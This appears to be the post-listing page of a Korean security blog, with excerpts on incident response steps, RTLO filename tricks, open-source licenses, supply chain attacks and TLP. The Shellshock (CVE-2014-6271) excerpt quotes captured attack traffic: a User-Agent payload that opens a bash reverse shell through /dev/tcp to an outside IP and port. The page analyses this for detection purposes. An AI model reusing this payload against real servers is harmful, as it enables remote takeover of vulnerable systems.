본문 바로가기
반응형

전체 글176

보안사고 침해사고 대응 절차 보안사고 침해사고 대응 절차 1. 침해 사고 대응 절차① 사전 대응 : 침해 사고가 발생하기 이전에 대응을 준비하는 단계로 실질적인 침해 사고 대응 체계를 갖춘다.② 사고 탐지 : 정상적인 운영 상태인지 침해 사고 발생 상태인지 확인한다.③ 대응 : 침해 사고로 인한 손상을 최소화하고 추가적인 손상을 막는다.• 단기 대응 : 손상을 최소화하기 위한 단계로 침해 사고가 발생한 시스템이나 네트워크를 탐지하고 통제할 수 있는 경우 해당 시스템이나 네트워크의 연결을 해제하거나 차단한다.• 백업 및 증거 확보 : 후속 처리를 위해 침해 사고 발생 시스템을 초기화하기 전에 백업하고, 포렌식 절차에 따라 시스템의 이미지를 획득한다.• 시스템 복구 : 시스템에 백도어 등의 악성코드를 제거하고, 시스템 계정 및 패스워드.. 2024. 8. 26.
RTLO(Right to Left Override)란 무엇인가 RTLO는 Right-To-Left Override의 약자로, 텍스트의 방향을 왼쪽에서 오른쪽이 아닌 오른쪽에서 왼쪽으로 변경하는 유니코드 문자입니다. 이 문자는 주로 악성코드에서 사용되며, 악용될 경우 다양한 피해를 입힐 수 있습니다. RTLO 악용 사례 1RTLO 문자를 이용한 첫 번째 악용 사례는 제목이나 파일 이름 등에 RTLO 문자를 사용하여 사용자가 인지하지 못한 채 파일을 다운로드하거나 실행시키는 경우입니다. 이를 통해 악성코드가 사용자의 컴퓨터에 침투할 수 있습니다. 이러한 공격 방식은 사용자들이 자주 이용하는 파일 공유 사이트나 이메일 등을 통해 이루어집니다.  RTLO 악용 사례 2소셜 미디어나 메신저 등에서 RTLO 문자를 사용하여 사용자의 프로필을 변경하거나 악성코드를 전송하는 경우.. 2024. 8. 26.
CVE-2014-6271 Shellshock 취약점 및 SonicWall SSL-VPN 원격 명령 실행(RCE) 취약점 Shellshock(CVE-2014-6271) 와 연관된 취약점 트래픽 탐지, 분석 정보 및 관련된 취약점 정보 탐지 트래픽 정보User Agent() { :; }; echo ; /bin/bash -c ‘nohup bash -i >& /dev/tcp/45[.]145.185.83/9999 0>&1 &’ Usernametest@liferay[.]com분석 정보취약점 설명Shellshock(CVE-2014-6271)Shellshock는 2014년에 발견된 Bash shell의 취약점이며, 공격자가 원격에서 코드를 실행할 수 있는 취약점이다.() { :; }; echo ; /bin/bash -c 'nohup bash -i >& /dev/tcp/45.145.185.83/9999 0>&1 &' 이 명령어는 “She.. 2024. 7. 3.
오픈소스 라이선스 종류 및 설명 GPL사용, 수정, 배포를 허용하지만, 모든 파생물은 GPL로 라이선스를 받아야 합니다.상용 제품에서 사용될 경우, 전체 제품이 GPL로 라이선스될 가능성이 있습니다.MIT소프트웨어를 수정하고 배포하는 것을 허용합니다. 그러나 수정된 코드의 라이선스가 MIT 라이선스인 것은 아닙니다.사용자에게 어떠한 보증도 제공하지 않습니다.Apache소스 코드의 수정 및 배포를 허용하지만, 모든 파생물에 대해 Apache 라이선스를 유지해야 합니다. 상용 제품에서도 사용할 수 있으며,상업적으로 안정적이고 안전한 오픈소스 라이선스 중 하나입니다.BSD소스 코드를 수정하고 배포하는 것을 자유롭게 허용합니다. 이것은 MIT 라이선스와 유사하지만,BSD 라이선스는 소프트웨어를 사용하는 사람들에게 어떠한 책임도 지지 않습니다... 2024. 7. 3.
공급망 공격(Supply Chain Attack) 이란 공급망 공격(Supply Attack)이란해커가 기업의 개발 환경에 침투하여 문제를 발생시키는 공격을 의미하며 금융 에너지, 정부 등 모든 산업에서 발생할 수 있는 공격 기법이다.예를 들어 소프트웨어를 제작, 배포하는 업체를 공격하여, 특정 버전에 백도어 악성코드를 심는 공격을 한다.  공급망 공급 공격은 소프트웨어나 하드웨어에서 발생할 수 있다.공급망 공격은 개발/배포 단계에서 변조된 악성코드가 소프트웨어 업체의 정상 업데이트 서버로 배포되기 때문에 사용자의 입장에서는 업데이트된 파일이 공격자에 의해 변조된 파일임을 쉽게 알아차릴 수 없다. 때문에 공격 발생 시 사용자의 입장에서는 속수무책으로 당할 수밖에 없고 기업의 입장해서는 공격이 발생하였음을 인지하기 전까지는 계속해서 악성코드를 유포하게 된다. .. 2024. 7. 3.
신호등 규약 TLP(Traffic Light Protocol) TLP란?TLP는 “Traffic Light Protocol”의 약자로, 정보 보안 분야에서 사용되는 규약입니다. 이 규약은 정보의 중요도에 따라 적용되며, 4단계로 구성됩니다.RED:정보가 최고로 기밀이며, 수신자는 TLP:RED 정보를 최초 공개된 특정 교환(이메일등),회의 또는 대화외의 제 3자와 공유할 수 없다. 예를 들어, 미팅에서 TLP:RED 정보는 미팅에 참가한 당사자들에게만 공유된다.대부분의 경우, TLP:RED에 해당되는 정보는 구두로 또는 당사자 간 직접 교환 해야한다.AMBER:정보가 중요하지만, 수신자는 TLP:AMBER 정보를 자신의 조직 구성원과 공유하고 자신을 보호하거나 추가 위험을 방지하기 위해 해당 정보를 알아야 하는 클라이언트 또는 고객들과만 공유할 수 있다.정보 생산자.. 2024. 7. 3.
반응형